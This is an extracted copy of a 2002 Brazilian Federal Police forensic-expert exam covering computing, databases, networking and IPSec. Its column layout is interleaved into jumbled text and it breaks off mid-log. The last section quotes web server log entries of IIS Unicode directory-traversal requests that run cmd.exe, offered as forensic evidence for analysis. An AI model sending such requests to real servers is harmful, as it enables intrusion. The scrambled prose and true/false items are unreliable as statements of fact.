Sei sulla pagina 1di 15

MINISTRIO DA JUSTIA (MJ)

DEPARTAMENTO DE POLCIA FEDERAL (DPF)


ACADEMIA NACIONAL DE POLCIA (ANP)
DIVISO DE RECRUTAMENTO E SELEO (DRS)

CONCURSO PBLICO
Aplicao: 19/1/2002

CARGO:
PERITO CRIMINAL FEDERAL
REA 3 COMPUTAO CIENTFICA

CADERNO DE PROVA:
CONHECIMENTOS ESPECFICOS

LEIA COM ATENO AS INSTRUES NO VERSO.


MINISTRIO DA JUSTIA (MJ) / DEPARTAMENTO DE POLCIA FEDERAL (DPF)
ACADEMIA NACIONAL DE POLCIA (ANP) / DIVISO DE RECRUTAMENTO E SELEO (DRS)
Concurso Pblico Aplicao: 19/1/2002
CARGO: PERITO CRIMINAL FEDERAL
REA 3 COMPUTAO CIENTFICA

INSTRUES
1 Este caderno constitudo da prova objetiva de Conhecimentos Especficos.

2 Caso o caderno esteja incompleto ou tenha qualquer defeito, o candidato dever solicitar ao fiscal
de sala mais prximo que tome as providncias cabveis.

3 Recomenda-se no marcar ao acaso: cada item cuja resposta divirja do gabarito oficial definitivo
acarretar a perda de 0,20 ponto, conforme consta no Edital n.o 45/2001 ANP/DRS DPF, de
31/10/2001.

4 No permitida a consulta a livros, dicionrios, apontamentos, apostilas, rguas, calculadoras ou


qualquer outro material.

5 Durante a prova, o candidato no dever levantar-se ou comunicar-se com outros candidatos.

6 A durao da prova de trs horas e trinta minutos, j includo o tempo destinado identificao
que ser feita no decorrer da prova e ao preenchimento da Folha de Respostas.

7 A desobedincia a qualquer uma das determinaes constantes nas presentes Instrues, na Folha
de Rascunho ou na Folha de Respostas poder implicar a anulao das provas do candidato.

AGENDA

I 22/1/2002 Divulgao dos gabaritos oficiais preliminares das provas objetivas na Internet no
endereo eletrnico http://www.cespe.unb.br ; nos quadros de avisos do CESPE/UnB, em Braslia;
nas Superintendncias Regionais da Polcia Federal das cidades em que foram aplicadas as provas
e na Academia Nacional de Polcia, em Braslia.
II 23 e 24/1/2002 Recebimento de recursos contra os gabaritos oficiais preliminares das provas
objetivas exclusivamente nos locais que sero informados na divulgao desses gabaritos.
III 1.o/3/2002 Data provvel da divulgao (aps a apreciao de eventuais recursos), no Dirio Oficial
e nos locais mencionados no item I, do resultado final das provas objetivas e do resultado provisrio
da prova discursiva.

Observaes:

No sero objeto de conhecimento recursos em desacordo com o estabelecido no item 9 DOS


RECURSOS do Edital n.o 45/2001 ANP/DRS DPF, de 31/10/2001.
Informaes relativas ao concurso podero ser obtidas pelo telefone 0(XX)614480100.
permitida a reproduo deste material, desde que citada a fonte.
MINISTRIO DA JUSTIA (MJ) / DEPARTAMENTO DE POLCIA FEDERAL (DPF)
ACADEMIA NACIONAL DE POLCIA (ANP) / DIVISO DE RECRUTAMENTO E SELEO (DRS)
Concurso Pblico Aplicao: 19/1/2002

CARGO: PERITO CRIMINAL FEDERAL


REA 3 COMPUTAO CIENTFICA
Nas questes de 21 a 50, marque, de acordo com o comando de cada uma delas: itens CERTOS na coluna C; itens ERRADOS na
coluna E. Na Folha de Respostas, a indicao do campo SR servir somente para caracterizar que o candidato desconhece a resposta
correta; portanto, a sua marcao no implicar apenao ao candidato. Use a Folha de Rascunho para as devidas marcaes e,
posteriormente, a Folha de Respostas.

CONHECIMENTOS ESPECFICOS
QUESTO 21 QUESTO 22

A programao dos primeiros computadores digitais era realizada


Os computadores digitais so, na realidade, uma evoluo das
em linguagem de mquina, o que restringia a poucos iniciados a
antigas mquinas de calcular mecnicas. Fortemente embasados em quantidade de programadores, devido necessidade de
tecnologia de eletrnica digital, eles se compem de uma parte conhecimento profundo dos detalhes da arquitetura da mquina.
Julgue os itens a seguir, relacionados a esse assunto.
denominada hardware a parte fsica do computador e outra
denominada software os programas ou conjunto de instrues 1 A criao dos chamados programas montadores, ou assemblers,
que permitem a execuo das diversas tarefas. Acerca de simplificou a tarefa de programao de uma mquina,
permitindo que se utilize uma linguagem simblica, ou
computadores digitais, julgue os itens abaixo. assembly, para a construo de programas a serem
posteriormente convertidos para a linguagem de mquina pelo
montador. Em funo de sua ainda estreita relao com a
1 Conceitualmente, o que diferencia um computador de uma
arquitetura da mquina, as linguagens assembly so tambm
calculadora eletrnica programvel a sua capacidade de especficas para cada tipo de CPU.
armazenar programas e dados em uma unidade de memria de 2 Compiladores so programas capazes de traduzir um programa
escrito em uma linguagem de programao de alto nvel, ou
massa, usualmente na forma de um disco magntico. seja, mais prxima de uma linguagem natural e independente da
2 A denominada mquina analtica, concebida em 1833 por arquitetura da mquina, para o cdigo de mquina necessrio
para ser executado. Assim, embora, para escrever um programa
Charles Babbage, um engenheiro e matemtico ingls, embora
em uma linguagem do tipo C, no seja essencialmente
fosse uma mquina puramente mecnica, continha os princpios necessrio conhecer a arquitetura da mquina em que ele ser
bsicos de um computador moderno. Em funo disso, Charles executado, para execut-lo em uma mquina especfica ser
necessrio utilizar tambm um compilador especfico para
Babbage considerado por muitos como Pai da Computao. aquele tipo de mquina.
3 Devido complexidade atual de sistemas operacionais como 3 Examinando-se o contedo de uma posio qualquer da
memria principal de um computador, pode-se imediatamente
Unix e Windows, requerido que os computadores modernos
determinar se aquela posio est sendo ocupada por uma
disponham de unidades de disco rgido com pelo menos dezenas instruo de um programa, ou um endereo referenciado pelo
de gigabytes de capacidade de armazenamento. programa, ou, ainda, um dado do programa, pois esses trs tipos
de informao tm formataes distintas na memria.
4 O avano tecnolgico dos ltimos cinqenta anos permitiu que
4 O tamanho da palavra bsica utilizada por uma CPU, por
atualmente se disponha, em um nico chip de computador, exemplo 16 bits ou 32 bits, determinante para o tamanho dos
nmeros que um computador com essa CPU pode manipular.
uma capacidade de processamento muito superior dos
Assim, em um computador de 32 bits, tem-se sempre maior
computadores digitais de primeira gerao, construdos na preciso nos clculos que em um computador de 16 bits.
dcada de 50, com gabinetes que ocupavam uma sala inteira e 5 Uma caracterstica essencial dos computadores a sua
capacidade de tomar decises, modificando o fluxo de execuo
que consumiam grande quantidade de energia eltrica.
das instrues de um programa em funo de resultados
5 Os denominados microcomputadores so aqueles computadores anteriores. Essa caracterstica deve-se ao fato de que as
que utilizam uma CPU microprogramada. linguagens de programao possuem instrues do tipo
IF ... THEN, ou semelhantes.

UnB / CESPE MJ / DPF / ANP / DRS Concurso Pblico Aplicao: 19/1/2002


Cargo: Perito Criminal Federal / rea 3 Computao Cientfica 1 / 13 permitida a reproduo, desde que citada a fonte.
QUESTO 23 QUESTO 24

Os ambientes de computao e de comunicao da informao vm-se


Sistemas operacionais so essencialmente programas
caracterizando por aportar a flexibilidade e as funcionalidades necessrias
gerenciadores dos recursos disponveis em um a um bom desempenho e obteno da qualidade nas empresas no ambiente
computador. Efetivamente, eles determinam a maioria das de negcios e nas organizaes em geral, exigindo assim abordagens
prprias de planejamento, projeto, implementao e suporte, abordagens
caractersticas perceptveis por um usurio da mquina. essas ligadas s caractersticas negociais e organizacionais. Acerca dessas
Em funo dessas caractersticas, julgue os itens em abordagens e da correlao entre sistemas de tratamento e comunicao da
informao com os processos negociais e organizacionais, julgue os itens que
seguida. se seguem.

1 Uma arquitetura de dados que prov o contexto para atendimento s


1 O MS-DOS, utilizado originalmente nos PCs, um necessidades de informao de um determinado negcio deve identificar
sistema multitarefas e monousurio. J o Microsoft os objetos de dados usados nesse negcio e delimitar os atributos desses
objetos, bem como as relaes entre objetos.
Windows, nas verses NT e 2000, um sistema
2 Uma arquitetura de aplicaes apropriada para um negcio deve limitar-
multiusurios, enquanto nas verses 9X um sistema se aos elementos de software e de tecnologias da informao e das
comunicaes necessrios para o tratamento das informaes da
monousurio. O Unix essencialmente um sistema
arquitetura de dados, de modo a atender aos propsitos do negcio em
multitarefas e multiusurios. questo.
2 Denomina-se Shell um interpretador de comandos que 3 O planejamento de uma estratgia de informaes deve apresentar uma
abordagem hierrquica que permita a anlise tanto das necessidades
realiza a interface entre um sistema operacional e o globais de informao do negcio, quanto das necessidades de cada
usurio. por meio do Shell que o usurio domnio particular que componha o negcio.
4 No contexto do planejamento da estratgia de informaes, um dos
normalmente passa, ao sistema operacional, comandos problemas especficos da anlise de necessidades informacionais a
dos tipos dir, copy e run. Normalmente, os sistemas delimitao de escopo dos sistemas de informao e comunicao.
5 Na anlise de necessidades de informao, constata-se que, embora os
operacionais do tipo Unix podem dispor de mais de um usurios tenham um entendimento completo das necessidades e do
Shell, que pode ser escolhido pelo usurio, conforme domnio do problema negocial, tais usurios de sistemas de informao
tm dificuldade em comunicar suas necessidades aos engenheiros de
suas preferncias.
sistemas e terminam por especificar os requerimentos de maneira
3 O Windows o nico sistema operacional a oferecer ambgua e sem critrios claros de verificao.
um ambiente de janelas, da a sua popularidade, por QUESTO 25

facilitar sua utilizao por usurios leigos. Nas arquiteturas de sistemas de informao modernos, integrando acesso,
transporte, processamento e armazenamento da informao, um importante
4 Os sistemas operacionais modernos geralmente tm
papel cabe ao middleware, o assim denominado software subjacente s
uma configurao-padro de instalao, em que alguns aplicaes e que inclui funes de comunicao, controles operacionais,
usurios e servios j esto predefinidos. importante elementos de gerncia e de segurana, suporte programao e operao
dos sistemas distribudos etc., elementos fundamentais s arquiteturas
se manter essa configurao-padro, eventualmente modernas de sistemas do tipo cliente-servidor, com duas ou trs camadas, e
acrescentando-se outros usurios e servios, conforme sistemas distribudos de uma maneira geral. Acerca dos diversos elementos
de middleware e dessas possveis arquiteturas, julgue os seguintes itens.
necessrio, para possibilitar a realizao de
atualizaes do sistema que venham a ser 1 Um exemplo de middleware considerado fundamental segurana nos
sistemas de arquitetura WWW so os secure sockets que permitem s
disponibilizadas pelos fabricantes ou fornecedores. aplicaes usufruir de servios de segurana relativos autentificao das
5 O controle de acesso aos recursos de um sistema partes comunicantes, integridade e confidencialidade dos dados.
2 Os objetos distribudos, associados com a tecnologia CORBA,
computacional essencial para a segurana do mesmo.
caracterizam-se por exigir homogeneidade da linguagem de programao
Quando essa uma preocupao, importante a utilizada no desenvolvimento desses objetos.
utilizao de um sistema operacional que disponha de 3 Em uma arquitetura cliente-servidor a duas camadas, o middleware tem
o papel de prover a interoperao entre a camada de servidor de
mecanismos prprios para o estabelecimento de uma aplicao e a camada de banco de dados.
poltica de controle de acesso. Nesse sentido, a escolha 4 Normalmente, uma arquitetura cliente-servidor a trs camadas usada
quando h pouco processamento a ser feito sobre os dados.
de um ambiente Windows NT/2000 ou Unix 5 Uma arquitetura cliente-servidor a trs camadas caracteriza-se por
prefervel a um ambiente MS-DOS ou Windows 9X, impossibilitar que a camada intermediria, tambm denominada camada
de servidor de aplicao ou camada de processamento, resida no mesmo
quando segurana um ponto a considerar. sistema servidor da camada de banco de dados.

UnB / CESPE MJ / DPF / ANP / DRS Concurso Pblico Aplicao: 19/1/2002


Cargo: Perito Criminal Federal / rea 3 Computao Cientfica 2 / 13 permitida a reproduo, desde que citada a fonte.
QUESTO 26 QUESTO 27

Tcnicas de reengenharia de sistemas vm sendo incorporadas A gesto de projetos de engenharia de software, alm de envolver
heursticas relacionadas s boas prticas de gesto de recursos e de
sistematicamente prtica corrente da engenharia de software, em pessoal, envolve cada vez mais a definio e a aplicao sistemtica
especial devido ao suporte oferecido pelas modernas ferramentas de mtricas objetivas para avaliao e acompanhamento da
CASE a esse tipo de tcnica. Assim, as tcnicas de engenharia evoluo dos riscos, da qualidade e do prprio ciclo de vida
(processo) do software. Acerca das mtricas de projeto, julgue os
direta e reversa, de reestruturao de cdigo e de documentao
itens que se seguem.
integram-se s tcnicas de gesto de configurao, documentao
e requisitos, entre outras. Em atividades de auditoria de sistemas, a 1 Mtricas relacionadas a tamanho de cdigo-fonte so
utilizao de tcnicas de reengenharia assistida por uma ferramenta sistematicamente aplicadas e teis. Entretanto, esse tipo de
mtrica no pode ser utilizado para a realizao de medidas
CASE pode ser bastante til para revelar detalhes internos de comparativas entre projetos que utilizem linguagens de
sistemas existentes, muitas vezes ocultos na documentao programao diferentes.
disponvel, bem como auxiliar na identificao de alteraes de 2 Mtricas de qualidade s podem ser definidas em termos
de parmetros subjetivos de qualidade. Assim, tais
configurao, documentao e especificao de requisitos desses
mtricas devem ser avaliadas na forma de questionrios
sistemas. Acerca da utilizao de tcnicas de reengenharia assistidas aplicados sistematicamente aos usurios do sistema em
por ferramentas CASE em auditoria de sistemas, julgue os itens a desenvolvimento.
seguir. 3 A estimativa de pontos de funo para um sistema ou mdulo a
ser construdo realizada com o objetivo de dimensionar os
recursos financeiros e os prazos estimados para a realizao das
1 Quando a documentao de um programa ou sistema no est etapas do projeto.
disponvel, suficiente realizar uma engenharia reversa 4 A avaliao de riscos consiste em avaliar objetivamente quais
os possveis prejuzos decorrentes do no-atendimento das
automtica a partir do cdigo-fonte para descobrir quais so as
especificaes para os requisitos do projeto.
suas principais funcionalidades e a semntica de suas estruturas 5 O produto da probabilidade de sucesso de uma etapa do projeto
de dados internas mais importantes. Entretanto, os detalhes de por uma varivel que dimensione o impacto (financeiro e(ou)
temporal) relacionado ao no-cumprimento da etapa define
implementao internos a cada funcionalidade no podem ser
objetivamente o risco associado a essa etapa.
revelados ou evidenciados com esse tipo de tcnica.
QUESTO 28
2 A engenharia direta, a partir da documentao e dos modelos
existentes em ferramenta CASE, pode ser usada para gerar a A gerncia de configurao e o controle de verses constituem
processos fundamentais do desenvolvimento de software. Acerca
estrutura bsica do cdigo-fonte correspondente a esses desses processos e das tcnicas a eles associadas, julgue os itens a
modelos. Tal cdigo, gerado automaticamente, pode ser usado seguir.
em termos comparativos com o cdigo-fonte do programa que
1 A configurao de um software constituda de trs grandes
est sendo analisado, com o objetivo de identificar diferenas
classes de itens: os programas-fonte e executveis, os
entre as especificaes constantes da documentao e as documentos que descrevem tais programas e os dados internos
estruturas realmente implementadas. e externos necessrios operacionalizao dos programas, itens
esses que compreendem a informao produzida como parte do
3 Alteraes maliciosas em programas podem ser detectadas
processo de engenharia do software.
automaticamente com o emprego sistemtico de ferramentas 2 Constata-se para os softwares de ciclo de vida longo que,
adequadas de controle de verso, que mantm indicadores de medida que o software evolui, a quantidade de itens de
integridade do cdigo-fonte e do cdigo executvel ou que configurao se estabiliza a partir de determinado momento do
ciclo de vida.
podem determinar diferenas entre verses anteriores existentes 3 O padro IEEE Std. 610.12-1990 define o conceito de baseline,
em cpias de segurana e em verses mais novas. que se trata de uma especificao (ou qualquer produto
4 Ferramentas de controle de verso, que mantm controle de resultante do desenvolvimento) que foi revista formalmente e
obteve aprovao, podendo assim servir de referncia ou base
alteraes embasado nos registros de datas de modificao e
para novos desenvolvimentos, e que s pode ser modificada por
excluso de arquivos integrados e mantidos pelo sistema intermdio de procedimentos formais de controle de
operacional, geram informaes e revelam, sem equvocos, a modificaes.
ocorrncia de alteraes em qualquer arquivo do projeto, 4 So tarefas bsicas da gerncia de configurao a identificao
de itens de configurao, o controle de verses, o controle de
mesmo que a natureza da alterao no possa ser claramente modificaes, a auditoria de configurao e o relatrio de status
identificada. de configurao.
5 Registros de log gerados pelas ferramentas CASE, quando de 5 Por ser um processo que se caracteriza por exigir um grau de
inteligncia muito alto, constata-se que praticamente no
seu uso sistemtico no desenvolvimento de sistemas, auxiliam
existem ferramentas de automao da gerncia de configurao,
na descoberta de trilhas de auditoria de modificaes nesses ainda que existam ferramentas especficas restritas ao controle
sistemas. de verses.

UnB / CESPE MJ / DPF / ANP / DRS Concurso Pblico Aplicao: 19/1/2002


Cargo: Perito Criminal Federal / rea 3 Computao Cientfica 3 / 13 permitida a reproduo, desde que citada a fonte.
QUESTO 29 QUESTO 30

Os SGBDs constituem elementos importantes na arquitetura dos A segurana de um banco de dados e a proteo da informao
armazenada so fatores fundamentais na escolha da arquitetura do
sistemas de informao atuais. Esses sistemas implementam, de banco de dados, dos modelos lgicos e fsicos utilizados, bem como na
acordo com as suas caractersticas prprias e a sua configurao, definio de restries e de critrios de acesso que devem ser
associados utilizao das linguagens de consulta, assuntos que so
servios que vo desde a manipulao e o armazenamento fsico inclusive objeto de exigncias de grandes organismos consumidores de
dos dados at a gesto de segurana das informaes. Assim, os software, assim como de governos de diversos pases. Acerca das
correlaes entre a proteo dos bancos de dados e das informaes e
sistemas de informao podem ser concebidos utilizando as escolhas estruturais e funcionais para a utilizao dos bancos de
dados, bem como de exigncias aplicveis no mercado internacional,
recursos e servios disponveis nos SGBDs e delegando para
julgue os itens seguintes.
estes boa parte de suas funcionalidades. Portanto, a recuperao
1 Os SGBDs modernos tipicamente suportam pelo menos uma
e a auditoria de sistemas de informao podem depender,
abordagem de segurana de dados, seja ela uma abordagem de
tambm, muitas vezes, de ferramentas e servios de auditoria, de controle discricionrio, seja de controle mandatrio.
2 No controle mandatrio, cada objeto armazenado assinalado com
recuperao de dados ou da gerncia de segurana disponveis
um certo nvel de classificao, enquanto a cada usurio atribudo
nos SGBDs utilizados. Acerca da utilizao de ferramentas e um nvel de liberao. Um determinado objeto s poder ser
acessado por usurios com a liberao apropriada.
servios de auditoria, recuperao e gesto de segurana dos
3 Para que o sistema de banco de dados possa checar se uma dada
principais SGBDs, julgue os itens subseqentes. solicitao de acesso est de acordo com as regras de segurana
aplicveis, suficiente que se especifique o objeto solicitado e o
usurio solicitante, para efeito de anlise pelo subsistema de
1 Em sistemas de bancos de dados de acesso concorrente, a autorizao do SGBD.
4 Como no se pode assumir que o sistema de segurana perfeito,
manuteno de jornais para as operaes em andamento
uma prtica fundamental a estruturao de uma trilha de auditoria
permite a recuperao do estado anterior ao de uma para examinar o que vem acontecendo e verificar se alguma
operao ou seqncia de operaes provocou violao da
operao, caso ocorra uma falha durante a execuo dessa
segurana.
operao. 5 Um dos possveis ataques que devem ser evitados pelos
subsistemas de proteo dos bancos de dados o ataque por
2 Os SGBDs modernos nada mais so que sofisticados
inferncia, em que, a partir das respostas a consultas autorizadas,
sistemas de controle de acesso embasado em uma poltica de o atacante procura inferir uma resposta a uma consulta que no
seria autorizada. A identificao e a eliminao desses ataques
segurana definida em termos de perfis de usurios. um tipo de controle mandatrio exigido para sistemas de bancos de
3 Todos os eventos relativos a tentativas de execuo de dados da classe C, segundo a classificao do Orange Book do
Departamento de Defesa dos Estados Unidos da Amrica.
operaes no-permitidas explicitamente pela poltica de
QUESTO 31
segurana geram registros nos sistemas de log dos SGBDs
O desenvolvimento de sistemas de informao concebidos para
modernos. Tais informaes so fontes teis para a
emprego e utilizao de arquitetura Web acarreta um conjunto de
identificao de tentativas de ataques a sistemas de banco de requisitos para as fases de projeto (design) e de implementao do
ciclo de vida do software. Esses requisitos precisam ser considerados
dados.
desde as fases de anlise e concepo dos sistemas, alm de
4 Ataques a sistemas de bancos de dados por abuso de influenciarem na definio da metodologia e da abordagem de
desenvolvimento a serem seguidas. Julgue os itens seguintes, acerca de
privilgios so possveis em sistemas com uma poltica de
metodologias de desenvolvimento de sistemas e de requisitos de
acesso pouco restritiva. A identificao desses ataques a projeto e implementao para sistemas com arquitetura Web.
partir dos sistemas de auditoria e de registro (log) do SGBD
1 A utilizao de tcnicas de orientao a objetos imperativa para
normalmente difcil, uma vez que operaes permitidas o projeto de interfaces, ainda que esse no seja necessariamente o
caso para o projeto de banco de dados.
pela poltica de segurana jamais geram registro.
2 Mtodos de projeto de sistemas hbridos, incorporando conceitos
5 O armazenamento fsico das informaes pelos SGBDs da concepo estruturada e da concepo por objetos,
simultaneamente, no so raros, ainda que existam caractersticas
feito normalmente na forma de arquivos com formatos conflitantes entre os dois tipos de metodologias.
prprios, fazendo que a recuperao das informaes, 3 A engenharia de sistemas deve considerar a definio de um
ambiente de comunicao e operao em rede, pois impossvel
quando da danificao dos arquivos e da ausncia de cpias obter, com uso de tecnologia Web, um sistema que possa ser
de segurana, necessite de conhecimento apropriado dos executado em um nico computador hospedeiro.
4 Um requisito tpico para projeto de sistemas para ambientes do tipo
formatos de armazenamento fsico. Em tal tipo de falha, nem Web a implementao de interfaces em linguagem HTML e suas
sempre a recuperao completa das informaes possvel, principais extenses.
5 O ciclo de vida de desenvolvimento de um software com
podendo ser nula, dependendo dos setores do arquivo que arquitetura Web no precisa ser necessariamente diferente do ciclo
tenham sido danificados. de vida de um sistema stand alone.

UnB / CESPE MJ / DPF / ANP / DRS Concurso Pblico Aplicao: 19/1/2002


Cargo: Perito Criminal Federal / rea 3 Computao Cientfica 4 / 13 permitida a reproduo, desde que citada a fonte.
QUESTO 32 QUESTO 34

Muitas das principais linguagens de programao da atualidade A integridade da informao considerada uma das propriedades
so linguagens cujas regras sintticas e semnticas incluem regras fundamentais da segurana da informao. Os protocolos de redes de
explcitas para o emprego de tipos de dados elementares e comunicao, com o objetivo de garantir a integridade da informao
durante as comunicaes, empregam vrios procedimentos
estruturas compostas e derivadas. Acerca da utilizao de tipos de especficos que trabalham com base em campos de controle definidos
dados e estruturas nas linguagens de programao freqentemente dentro das prprias unidades de dados dos protocolos, a exemplo dos
usadas na atualidade, julgue os seguintes itens. campos destinados a seqenciamento da informao, reconhecimento
das transmisses e verificao de erros de transmisso. Acerca dos
1 Em Java 2TM e em ANSI/ISO C++, a converso (casting) campos de verificao de erros nos protocolos de redes, julgue os
entre tipos elementares para representao de variveis itens a seguir.
numricas geralmente automtica, mas deve ser anotada 1 Nos casos de utilizao de cdigos de redundncia cclica (CRC),
explicitamente sempre que existir a possibilidade de reduo dados os blocos de bits da mensagem, o transmissor gera uma
de preciso. seqncia de verificao de erros de quadro (FCS), que
2 A palavra-chave class usada para definir tipos derivados em acrescentada mensagem original, de tal modo que a mensagem
Java e em C++, duas linguagens orientadas a objetos. De fato, resultante exatamente divisvel por um nmero predeterminado.
Cabe ao receptor fatorar a mensagem e descobrir esse nmero,
tais tipos constituem as principais estruturas dos programas considerando a mensagem correta caso tenha sucesso na
orientados a objetos, escritos nessas linguagens. fatorao.
3 No existem ponteiros em Java, tipos encontrados 2 O quadro do MAC ethernet 802.3 a 10 Mbps possui um campo de
freqentemente em programas C/C++, mas tipos equivalentes verificao FCS, com cdigo de redundncia cclica de 32 bits,
a ponteiros so construdos pela utilizao de referncias em calculado sobre todos os demais campos, exceto o campo de
Java. prembulo do quadro.
3 Nos pacotes IP, o campo denominado header checksum, de
4 Em C++, o casting de qualquer tipo de ponteiro para void* 16 bits, aplicado somente ao cabealho dos pacotes e deve ser
permitido. Entretanto, esse recurso est cada vez mais em verificado e recalculado em cada roteador, posto que alguns
desuso, aps a introduo do suporte a Run Time Type campos do cabealho IP podem ser modificados durante o
Information em C++. trnsito.
5 Ponteiros para funes so recursos da linguagem C/C++ que 4 Posto que o protocolo UDP no oferece garantia de entrega das
mensagens, o campo de checksum dos datagramas UDP no
permitem enderear trechos de cdigo executvel.
utilizado para verificao de integridade, sendo colocado na
QUESTO 33 unidade de transmisso apenas para manter a mesma formatao
do checksum do TCP.
A construo e a utilizao de cdigos-fonte de programas de 5 Nas clulas ATM, o campo de 8 bits header error control (HEC),
computador possuem caractersticas diferentes em funo do tipo calculado a partir de apenas 32 bits do restante do cabealho,
de linguagem. Assim, o uso de cada linguagem est ligado ao permite tanto a deteco de erros, quanto, em alguns casos, a
correo deles.
emprego de ferramentas especficas para a interpretao e a
execuo do cdigo-fonte. Acerca da maneira como os cdigos- QUESTO 35

fonte das principais linguagens de programao so utilizados Reconhecendo que a segurana do protocolo IP um importante
para a gerao de programas de computador e acerca das aspecto no contexto de uma rede segura com arquitetura TCP/IP, o
ferramentas disponveis para essa finalidade, julgue os itens IETF vem publicando vrias RFCs que definem uma capacidade
abaixo. especfica de segurana no nvel IP (IPSec), incluindo
funcionalidades de autentificao e de confidencialidade como
extenses para esse protocolo nas suas verses 4 e 6. Acerca do
1 Compiladores para linguagens C, C++, Pascal e Java no IPSec, julgue os itens abaixo.
geram cdigo executvel.
2 Montadores so compiladores para linguagens de baixo nvel, 1 Um conceito-chave que aparece tanto nos mecanismos de
mas, ao contrrio destes, geram cdigos que podem ser autentificao, quanto de confidencialidade do IPSec a
carregados diretamente em memria e executados. associao de segurana. Uma associao desse tipo consiste em
um relacionamento bidirecional entre um transmissor e um
3 Ligadores so, por definio, utilizados para construir, a partir
receptor.
de fragmentos disjuntos de cdigo-objeto, seguimentos 2 O mecanismo de authentication header (AH) do IPSec prov
endereveis que constituem unidades autnomas e suporte tanto para a integridade dos dados, quanto para a
independentes de execuo. autentificao dos pacotes IP.
4 Interpretadores de comandos so mquinas virtuais que geram 3 O suporte a IPSec opcional em IPv4 e IPv6.
cdigo executvel diretamente a partir do cdigo-fonte, como 4 Para efeito do AH, os dados de autentificao so calculados
sobre o pacote IP integral, excluindo qualquer campo que possa
o caso de interpretadores PERL e Java. ser modificado em trnsito. Tais campos so considerados como
5 Extenses de HTML permitem embutir elementos de cdigo bits zero para o propsito de clculos nos pontos de origem e
Java em unidades HTML, que so compilados e interpretados destino.
no lado cliente, no caso de applets, e no lado servidor, no caso 5 O mecanismo de encapsulating security payload (ESP) prov
de servlets. Alternativamente, JavaScript e JSP permitem a suporte tanto integridade quanto confidencialidade dos pacotes
elaborao de cdigos com sintaxe bastante semelhante da IP. Em funo de requisitos de aplicao, esse mecanismo pode
ser usado para cifrar tanto o segmento da camada de transporte
linguagem Java, mas que podem ser executados sem (TCP e UDP, por exemplo), quanto o pacote IP inteiro, sendo tais
compilao prvia, respectivamente nos lados cliente modos de utilizao conhecidos, respectivamente, como ESP em
(navegadores) e servidor de aplicaes distribudas. modo transporte e ESP em modo tnel.

UnB / CESPE MJ / DPF / ANP / DRS Concurso Pblico Aplicao: 19/1/2002


Cargo: Perito Criminal Federal / rea 3 Computao Cientfica 5 / 13 permitida a reproduo, desde que citada a fonte.
Texto CE questes de 36 a 38

Os trechos abaixo foram retirados de um arquivo de log referente a acessos a um servidor http.

atacker1.nowhere.com - - [01/Nov/2000:18:20:49 +0000] "GET


/scripts/..%C0%AF../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 306
atacker2.nowhere.com - - [11/Jan/2001:09:24:05 +0000] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344
atacker2.nowhere.com - - [11/Jan/2001:09:24:05 +0000] "GET
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c
0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 346
atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/
winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 342
atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET /cgi-
bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344
atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 345
atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET
/wwwroot/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344
atacker3.nowhere.com - - [19/Jan/2001:08:18:37 -0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 461
atacker3.nowhere.com - - [19/Jan/2001:08:18:37 -0200] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 461
atacker4.nowhere.com - - [22/Jan/2001:21:19:27 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 200 607
atacker4.nowhere.com - - [22/Jan/2001:21:19:49 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+c:d:\ HTTP/1.0" 502 283
atacker4.nowhere.com - - [22/Jan/2001:21:20:08 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+d:\ HTTP/1.0" 200 342
atacker4.nowhere.com - - [22/Jan/2001:21:20:25 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+e:\ HTTP/1.0" 200 543
atacker5.nowhere.com - - [23/Jan/2001:04:28:41 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 200 607
atacker5.nowhere.com - - [23/Jan/2001:04:29:00 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+c:\inetpub HTTP/1.1" 200 493
atacker5.nowhere.com - - [23/Jan/2001:04:29:06 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
c0%af/winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot HTTP/1.1" 200 828
atacker6.nowhere.com - - [23/Jan/2001:04:30:02 -0200] "GET
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%
